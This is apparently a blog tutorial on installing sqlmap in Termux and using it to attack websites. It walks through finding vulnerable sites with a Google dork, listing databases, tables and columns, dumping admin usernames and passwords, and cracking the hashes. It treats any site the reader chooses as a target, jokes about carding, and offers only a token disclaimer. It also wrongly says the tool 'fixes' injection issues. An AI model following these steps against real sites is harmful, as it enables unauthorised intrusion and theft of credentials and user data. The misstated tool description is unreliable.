How To Install And Use Sqlmap In Termux
I’ll demonstrate how to instal and use SQLMAP in Termux in this article. First off, SQLMAP is an open-source programme that automatically finds and fixes issues related to SQL injection. An attacker can control and alter a database on a server by performing a SQL injection attack.
Consequently, we may use that to steal or obtain a database from any website we choose. For instance, we can get the database’s admin user name and password for a website.
And if you’re lucky, you might be able to get a CC (Credit Card/Credit Card) for those who enjoy carding. Just kidding, though. Don’t use SQLMAP for any illicit activities.
Okay, let’s get going now.
Items required:
a mobile phone running Android 5.0 or above.
Download the termux app from the Play Store.
good online connectivity
Launch the Termux app if you downloaded it.
First, we’ll use the command to update the package list:
apt update
Now we have to install Python with the following command:
apt install python python2
Await Python’s installation. We will instal git after installing Python. You can clone the package with the aid of Git.
apt install git
We’ll use the git command to clone the SQLMAP package into our directory after installing git.
git clone https://github.com/sqlmapproject/sqlmap
Await the procedure’ completion. Now that the procedure has been completed, we must access the tool directory using the following command.
cd sqlmap
Using the following command, we can now provide them access to read, write, and execute the SQLMAP Python file:
chmod +x sqlmap.py
After that, you need to run the following command to run the SQLMAP
python2 sqlmap.py
Now SQLMAP is successfully installed on your Termux.
The next time you wish to run SQLMAP, you must first start Termux and then access the SQLMAP directory by executing the command cd sqlmap. And after that, you must execute SQLMAP with the command python2 sqlmap.py.
Let’s now look into SQLMAP’s website hacking capabilities.
Let me tell you first. Websites with a SQL injection vulnerability can be hacked.
Perhaps you’re wondering right now how to identify a website that has a SQL injection vulnerability.
To identify a website’s SQL injection vulnerability, utilise Google Dorks.
most websites have a PHP-based SQL injection vulnerability?
id=1 or any other value that appears after PHP?id=
You can use this Google dork inurl to find the vulnerable websites: PHP?id=1 or any value after PHP?id=
You can find more information about Google dorks here: Google hacking
Type the following command:
This command will help you to find out the database of the website
python2 sqlmap.py -u <your website> –dbs
If the website is vulnerable then you will found the output similar to this:
*Information_schema
*Database
Now our next step is to find tables that are present in the database with the following command
python2 sqlmap.py -u <your website> –D Database –tables
The aforementioned statement instructs Sqlmap to identify the databases’ tables.
You’ll realise that information schema are useless, so don’t waste your time trying to discover credentials or other interesting information there.
The tables you see after running the aforementioned command will resemble those below.
*id
*users
*admin
Now our next step is to find columns under the table admin.
python2 sqlmap.py -u <your website> -D Database -T admin –columns
The aforementioned statement instructs Sqlmap to identify the columns in the admin table.
Let’s now go to our last command.
As an illustration, you discovered the username and password in the column. The username and password must now be stored in text format on your Android device.
python2 sqlmap.py -u <your website> -D Database -T admin -C username, password –dump
The aforementioned command will store the login and password on your device in text format.
The password might be encoded using md5, for example. The majority of passwords are written in text. If the password has been encrypted, you will need to decrypt it using findmyhash or another password-decryption tool.
You may simply hack any website that is vulnerable to SQL injection by using the instructions below. Thank you later.
Note: Substitute “your website” for the URL of the target website; make sure it ends with PHP?id=1 or any number after it. The SQLMAP will not function if a simple URL without PHP?id= is provided.
Enjoy 🥰.
